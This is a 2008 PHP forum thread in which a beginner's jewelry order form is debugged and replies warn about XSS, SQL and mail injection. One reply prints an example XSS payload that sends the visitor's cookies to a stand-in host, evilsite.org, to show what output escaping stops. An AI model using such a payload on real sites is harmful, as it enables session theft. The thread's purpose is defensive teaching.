TalkPHP
Home Forums Articles Glossary Awards Register Rules Members Search Today's Posts Mark Forums Read
 
 
 
Account Login
Latest Articles
» The basic usage of PHPTAL, a XML/XHTML template library for PHP
by awuehr on 11-10-2008 in Tips & Tricks
» Vulnerable methods and the areas they are commonly trusted in.
by Village Idiot on 11-04-2008 in Classes & Objects
» Simple way to protect a form from bot
by codefreek on 10-23-2008 in Basic
» The Basics On: How Session Stealing Works
by wiifanatic on 09-12-2008 in Security & Permissions
» How to keep your forms from double posting data
by drewbee on 07-03-2008 in Tips & Tricks
IRC Channel
IRC Speech Bubble Join the friendly bunch on IRC...
(#TalkPHP on Freenode)

...Also available via a web interface.

See this thread for information on the TalkPHP Free Hugs Initiative™. Subject to availability.
Associates
Associates
CSS Tutorials
TalkPHP > Developer Forums > Absolute Beginners » PHP fill in form help
Reply
 
LinkBack Thread Tools Search this Thread Display Modes
Old 10-08-2008, 01:55 AM   #1 (permalink)
The Wanderer
 
sacred_tinker's Avatar
 
Join Date: May 2008
Location: Singapore
Posts: 11
Thanks: 0
sacred_tinker is on a distinguished road
Default PHP fill in form help
Hey!

so, i have a website thats all coded with html, except for the fill-in form (order form) thats coded with PHP.


i have three issues with my PHP code.
1) i've uploaded my code onto my website but when i go there i get this message:
Parse error: parse error, unexpected $ in /home/content/l/e/o/leopoldine/html/order.php on line 1008
but the issue is that there are only 1007 lines in my whole code!

2) when you hit submit, i receive an email telling me what the person filled in. But once you hit submit, the thanks-for-your-order page doesn't show up.

3) i have PHP Editor 2.22 and when i open my code in it, this "window" thingy is highlighted in red and underlined:
<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.mywebsite.com/ordersent.php";>
</script>

could someone please help me?
sacred_tinker is offline   		Reply With Quote
Old 10-08-2008, 02:08 AM   #2 (permalink)
The Addict
 
Enfernikus's Avatar
 
Join Date: Jun 2008
Posts: 335
Thanks: 2
Enfernikus is on a distinguished road
Default
1) Paste your script
2)

PHP Code:
<script language="JavaScript" type="text/JavaScript">
<window.location.href "http://www.mywebsite.com/ordersent.php";>
</script> 
is more correctly written like so

PHP Code:
<script language="JavaScript" type="text/JavaScript">
window.location.href "http://www.mywebsite.com/ordersent.php";
</script> 
Enfernikus is offline   		Reply With Quote
Old 10-08-2008, 02:38 AM   #3 (permalink)
The Wanderer
 
sacred_tinker's Avatar
 
Join Date: May 2008
Location: Singapore
Posts: 11
Thanks: 0
sacred_tinker is on a distinguished road
Default
PHP Code:
<?php



include("emailtemplate.php");






if(isset($_POST['submit'])) { 



#=============================================

#    Check if the required fields were entered

#=============================================



if(!$_POST['txt_name']) { die('You must enter your name, the field is required <br> <a href="javascript:history.back(-1)">go back</a>'); }

else if(!$_POST['txt_address']) { die('You must enter your address, the field is required<br> <a href="javascript:history.back(-1)">go back</a>'); }









#=============================================

#    Protect against XSS and hackers

#=============================================



$name addslashes($_POST['txt_name']);

$email addslashes($_POST['txt_email']);



if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$"$email)) { die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>'); }





$txt_msg addslashes($_POST['txt_msg']);

$txt_address addslashes($_POST['txt_address']);



$chk_purchase $_POST['chk_purchase'];

$chk_fixpurchase $_POST['chk_fixrepair'];



$drop_mod1 $_POST['drop_mod1'];

$drop_mod2 $_POST['drop_mod2'];

$drop_mod3 $_POST['drop_mod3'];

$drop_mod4 $_POST['drop_mod4'];

$drop_mod5 $_POST['drop_mod5'];



$drop_payment $_POST['drop_payment'];

$drop_delivery $_POST['drop_delivery'];

$drop_choice $_POST['drop_choice'];



if($_POST['drop_payment'] == "d1") {



#============================

#    Paypal was selected

#    Assign the values

#============================



$paypal_name $_POST['paypal_name'];

$paypal_email $_POST['paypal_email'];



$paypal_msg "Paypal Account Information: <br> Name: $paypal_name <br> Email: $paypal_email<br>";

}





#======================================================

#    Send email

#======================================================

// To send HTML mail, the Content-type must be set
$headers  'MIME-Version: 1.0' "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' "\r\n";

// Additional headers
$headers .= 'To: Tinkas <formreciever@live.com>' "\r\n";
$headers .= 'From: formreciever@live.com <formreciever@live.com>' "\r\n";

$subject "An order has been placed!";






$sentmail mail($to,$subject,$message,$headers);

?>



<html>



<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Tinka's Trinkets - (www.leopoldine.com/TinkasTinkets)</title>

<STYLE TYPE="text/css">
<!--
BODY
   {
   font-family:arial;
   }
-->
</STYLE>
<style type="text/css">



#d1 { display:none; }



</style>

<script language="javascript">



            var oldD="";

            function show(o){

                if(oldD!="") oldD.style.display='none';

                if(o.selectedIndex>0){

                    var d=document.getElementById(o[o.selectedIndex].value);

                    d.style.display='block';

                    oldD=d;

                }

            }

        </script>



</head>



<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">



<basefont face="arial, veradana">



<table border="0" width="959" id="table1">

    <tr>

        <td width="958">

        <table border="0" width="100%" id="table7">

            <tr>

                <td>

        <img border="0" src="pics/tt/ttbanner.jpg" width="951" height="116"></td>

            </tr>

        </table>

        <table border="0" width="100%" id="table6">

            <tr>

                <td bgcolor="#29CAE1">

                <font size="2">

                &nbsp;<a href="index.htm" style="text-decoration:none"><font color="#000000">leopoldine-jpm.com</font></a>

                &gt; Tinka's Trinkets &gt; Place an Order</font></td>

            </tr>

        </table>

        <table border="0" width="957" id="table2">

            <tr>

                <td rowspan="3" width="159" align="center" bgcolor="#A6DD00">

                <p align="left"><br>

                <b><font face="Arial" size="2">&nbsp;&nbsp;

                </font><a href="index.htm">

                <font face="Arial" size="2" color="#000000">

                <span style="text-decoration: none">Main</span></font></a></b></p>

                <p align="left">

                        <b>

                        <font color="#008000" size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttindex.htm" style="text-decoration:none">

                        <font size="2" face="Arial" color="#000000">Tinka's Trinkets Home</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttnaturale.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Natural Elements</font></a></b></p>

                <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttmetale.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Metal Elements</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttmisc.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Miscellaneous</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        </b><a href="ttarchives.htm" style="text-decoration: none">

                        <b><font face="Arial" size="2" color="#000000">Design 

                        Archives</font></b></a></p>

                <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttcatalog.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Catalog</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <font color="#008000" size="2" face="Arial">Place an Order</font></a></b></p>

                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                  <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                  <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                </td>

                <td width="788" align="center" height="100">

                  <p align="center"><b><font size="5">Place an Order</font></b></p>

                    <p align="center"><font size="2">If you're interested in 

                    purchasing earrings or getting some of you jewelry repaired 

                    please fill in the form below:</font></p>

                <hr width="500" style="background-color: #000000" color="#A6DD00">

                </td>

            </tr>

            <tr>

                <td width="788" align="center" height="204">

                <font size="2">

                <html>

</b></font><font size="4">Jewelry Order From</font></font>

<form action="http://www.leopoldine-jpm.com/cgi-bin/FormMail.php" method="post">

<table cellpadding="3" id="table8">

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Full Name:</b></font><font face="Arial"><br>

    <input type="text" name="txt_name" value="" size="28"><br>

&nbsp;</font></td>

</tr>

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Your Email:</b></font><font face="Arial"><br>

    <input type="text" name="txt_email" value="" size="28"><br>

&nbsp;</font></td>

</tr>

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>I'd like to:</b><br>

    

    <select name="drop_choice">

    <option value="Purchase Jewelry">Purchse Jewelry</option>

    <option value="Fix or Repair Jewelry">Fix/Repair Jewelry</option>

    </select>



    

</td>

</tr>

<tr>

<td style="font-size; font-family; color">

<font size="2" face="Arial"><b>Select the models you wish to order:<br>

</b></font><i><font face="Arial" size="2" color="#666666">(If you do not wish to 

purchase any jewelry (or would like to purchase less than 5 pairs/sets), leave 

the boxes on the &quot;select&quot; option)</font></i><font face="Arial"><br>

<select name="drop_mod1">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</optgroup>

</select>





<select name="drop_mod2">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp;&nbsp; </font>

<select name="drop_mod3">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp;&nbsp; </font>

<select name="drop_mod4">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp; </font>

<select name="drop_mod5">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><br>

&nbsp;</font></td>

</tr>

<tr><td style="font-size; font-family; color"><font face="Arial"><b><font size="2">Message:<br>

    </font></b><font size="2"><i><font color="#666666">[In your message, please 

    specify the <u>quantity</u> of each model of earring you would like to order 

    (if you are ordering more than one pair) and specify any <u>modifications</u> 

    you would like to have made on the models you have selected (or to the 

    jewelry you would like to have fixed). If you are paying via Paypal, please 

    specify your Paypal email address).]</font></i><br></font>

    <textarea rows="10" cols="95" name="txt_msg">

Type your message here.

</textarea><br>

&nbsp;</font></td></tr>

<tr>

    <td height="47" style="font-size; font-family; color">

    

    <font face="Arial" size="2"><b>Method of Payment:</b></font>

    

      <select name="drop_payment" onChange="show(this)">

    <option value="Cash" rel="none">Cash</option>

    <option value="d1" >Paypal</option>

    </select>

    

    <br/>

    

    <div id="d1" style="font-family:verdana; font-size:10pt; color:#000066; border:1px solid ##A6ACB3; background-color:#FAFCF7; width:40%; padding:10px;">

   <p>You selected Paypal, please enter your name and email address that you entered into your paypal account.</p><br/>

    <table border="0" style="font-family:verdana; font-size:10pt; color:#000066; ">

    <tr>

    <td>Name:</td>

    <td><input type="text" name="paypal_name"></td>

    </tr>

    <tr>

    <td>Email:</td>

    <td><input type="text" name="paypal_email"></td>

    </tr>

    </table>

    </div>

    

    

    

&nbsp;</td></tr>

<tr><td style="font-size; font-family; color"><font face="Arial" size="2"><b>Delivery:</b></font><br>

    

    <select name="drop_delivery">

    <option value="Local">Local Pick-up (meet up)</option>

    <option value="Domestic">Domestic Postage (within Singapore)</option>

    <option value="International">International Postage</option>

    </select>

    <br>

    <font color="#666666" size="2" face="Arial"><i>(Handling is free of charge but 

    postage fees apply)</i></font>

</td>

</tr></td></tr>

<tr><td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Address: </b></font>

    <font face="Arial"><br>

    <textarea rows="10" cols="30" name="txt_address">

Type your address here.

</textarea><br>

&nbsp;</font></td></tr>

 <tr><td align="center" style="font-size; font-family; color">

<p align="left"><font face="Arial"><input type="submit" value="Submit" name="submit"><font size="2"> </font> <input type="reset" value="Clear"></font></p>

<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.leopoldine-jpm.com/ttordersent.php";>
</script>

    </td></tr>

</table>

</p>

</form>

                <p>&nbsp;</p>

</font>

                <hr width="500" style="background-color: #000000" color="#A6DD00">

                  <font size="2">

<p>In case the fill out form doesn't work, or you have any 

                questions, feel free to send me an 

                email:<br>

</font><a href="mailto:formreciever@live.com">

                <font face="Arial" color="#008000" size="3"><b>Click

        here to send me an e-mail!</b></font></a></p>

                <hr width="788" style="background-color: #000000" color="#29CAE1">

                </td></p>

            </tr>

            <tr>

                <td width="788" align="center"><font size="2"><font face="Arial" size="2"><!--[if gte mso 9]>

                <![endif]--><b>Contact</b></font><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2"><br>

                  <u>E-mail:</u> </font></span><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2">formreciever@live.com</font></span><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2"><br>

&nbsp;</font></span></font></td>

            </tr>

                    </table>

    <table border = "0" height="23">

  <tr>

    <td><hr width="950" style="background-color: #000000"></td>

  </tr>

</table>

<center><font color="#000000" face="Arial" size="1">[This site is best viewed with a 1024 x 768 screen resolution]<br>

© <em><small><small>Images, </small></small><small><small>content &amp; design</small></small><small><small>

copyright 2008 by Léopoldine Dubrulle 

(Tinka). &nbsp; All rights reserved</small></small></em></center>

    </font>

            </tr>

        </table>

</form>

</body>

</html>
sacred_tinker is offline   		Reply With Quote
Old 10-08-2008, 10:05 AM   #4 (permalink)
The Frequenter
 
ReSpawN's Avatar
 
Join Date: Nov 2007
Location: Netherlands
Posts: 460
Thanks: 49
ReSpawN is on a distinguished road
Default
As it stands, I am not sure whether else if() is allowed. PHP usually copes well with just elseif. JavaScript on the other hands, uses else if instead of elseif. :) I think your first problem might be there.

As Enfernikus also told you, NEVER and I mean NEVER use unregular experessions in your script (javascript). < and > are operators, which are not to be used outside a compareson of sorts. This includes if, else, for, try, catch and so forth.

More to the point, I think your problem lies with the else if.
__________________
"Life is a bitch, take that bitch on a ride"
Send a message via MSN to ReSpawN
ReSpawN is offline   		Reply With Quote
Old 10-08-2008, 10:41 AM   #5 (permalink)
The Prestige
Advanced Programmer Top Contributor Good Samaritan 
 
sketchMedia's Avatar
 
Join Date: Oct 2007
Location: Manchester, UK
Posts: 854
Thanks: 32
sketchMedia is on a distinguished road
Default
the IF:
PHP Code:
if(isset($_POST['submit'])) { 
isn't properly closed.

A few things about your code.

Try to format it better, one line IF's can harm readability if they are large in length, and also statements need to be properly indented.
Try to control the amount of white space used to separate different sections and your comments, whilst informative are very bulky and cloud the code, reducing them to one liners and removing comments from obvious code will help.

This excellent post by VillageIdiot will give you more information about formatting code.
Writing Clean Code

Also using preg_match instead of eregi is faster:
PHP Code:
if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$/"$email)) { 
    die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>'); 
note i had to add the two expression delimeters '/' to the start and finish of the expression.

XSS/SQL INJECTION, the addslashes isn't going to be enough to protect against XSS, and also if the data is going to be inputted into a database it also wont protect against SQL injection.

Remember: FIEO (Filter Input Escape Output)

Using mysql_real_escape_string will protect you from SQL injection, whilst using something like htmlentities to convert the special html tags to their entity codes would be a start, it would make this malicious code fail:
html Code:
<script>
new Image().src='http://evilsite.org?cookies='+ encodeURI(document.cookie);
</script>

would be converted to:
html Code:
&lt;script&gt;
new Image().src='http://evilsite.org?cookies='+ encodeURI(document.cookie);
&lt;/script&gt;
And not executed by the browser.

Although its not fool proof by any means, its a start.

More info: Chris Shiflett: Foiling Cross-Site Attacks

But to answer you question fully, there is a missing '}'.
__________________
mysql> SELECT * FROM `users` WHERE `users`.`clue` > 0;
Empty set (0.00 sec)
sketchMedia is offline   		Reply With Quote
Old 10-08-2008, 11:32 AM   #6 (permalink)
The Wanderer
 
sacred_tinker's Avatar
 
Join Date: May 2008
Location: Singapore
Posts: 11
Thanks: 0
sacred_tinker is on a distinguished road
Default
Eeeeep!
i'm sooo lost! someone made this code for me so i have no clue whats happening or what to do! >.<
sacred_tinker is offline   		Reply With Quote
Old 10-08-2008, 12:28 PM   #7 (permalink)
The Prestige
Advanced Programmer Top Contributor Good Samaritan 
 
sketchMedia's Avatar
 
Join Date: Oct 2007
Location: Manchester, UK
Posts: 854
Thanks: 32
sketchMedia is on a distinguished road
Default
I think this is what the code should be like (minus the html):
PHP Code:
include 'emailtemplate.php';

if(isset($_POST['submit']))
{
    if(!$_POST['txt_name'])
    {
        die('You must enter your name, the field is required <br> <a href="javascript:history.back(-1)">go back</a>');
    }
    elseif(!$_POST['txt_address'])
    {
        die('You must enter your address, the field is required<br> <a href="javascript:history.back(-1)">go back</a>');
    }

    $name  addslashes($_POST['txt_name']);
    $email addslashes($_POST['txt_email']);

    if(!preg_match('/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$/'$email))
    {
        die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>');
    }

    $txt_msg         addslashes($_POST['txt_msg']);
    $txt_address     addslashes($_POST['txt_address']);
    $chk_purchase    $_POST['chk_purchase'];
    $chk_fixpurchase $_POST['chk_fixrepair'];

    $drop_mod1 $_POST['drop_mod1'];
    $drop_mod2 $_POST['drop_mod2'];
    $drop_mod3 $_POST['drop_mod3'];
    $drop_mod4 $_POST['drop_mod4'];
    $drop_mod5 $_POST['drop_mod5'];

    $drop_payment  $_POST['drop_payment'];
    $drop_delivery $_POST['drop_delivery'];
    $drop_choice   $_POST['drop_choice'];

    if($_POST['drop_payment'] == "d1")
    {
        $paypal_name  $_POST['paypal_name'];
        $paypal_email $_POST['paypal_email'];
        $paypal_msg   "Paypal Account Information: <br> Name: $paypal_name <br> Email: $paypal_email<br>";
    }
    // To send HTML mail, the Content-type must be set
    $headers  'MIME-Version: 1.0' "\r\n";
    $headers .= 'Content-type: text/html; charset=iso-8859-1' "\r\n";

    // Additional headers
    $headers .= 'To: Tinkas <formreciever@live.com>' "\r\n";
    $headers .= 'From: formreciever@live.com <formreciever@live.com>' "\r\n";

    $subject 'An order has been placed!';

    $sentmail mail($to$subject$message$headers);
That will now run, however the script doesnt seem to do anything apart from send an email saying 'an order was placed'

If you are going to use POST variables inside an email, you will have to be careful of mail injection, much like sql injection extra code can be injected into the script. This is usually a favourate exploit of spammers, who can use your form to spam. Usually the way to combat this is to check for any new lines and carrage returns from user input (\n\r).
PHP Code:
if(preg_match("/(\r|\n)$/i"$input)) { 
    die('Dont try and inject stuff into the email, it really is rather exasperating.'); 
Should work (im not the best at regex so there are probably ways around it).
__________________
mysql> SELECT * FROM `users` WHERE `users`.`clue` > 0;
Empty set (0.00 sec)
sketchMedia is offline   		Reply With Quote
Reply

« Previous Thread | Next Thread »


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Hybrid Mode Hybrid Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 02:50 PM.

 
     
Contact Us - TalkPHP - PHP Community - Archive - Top

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.1.0
Inactive Reminders By Icora Web Design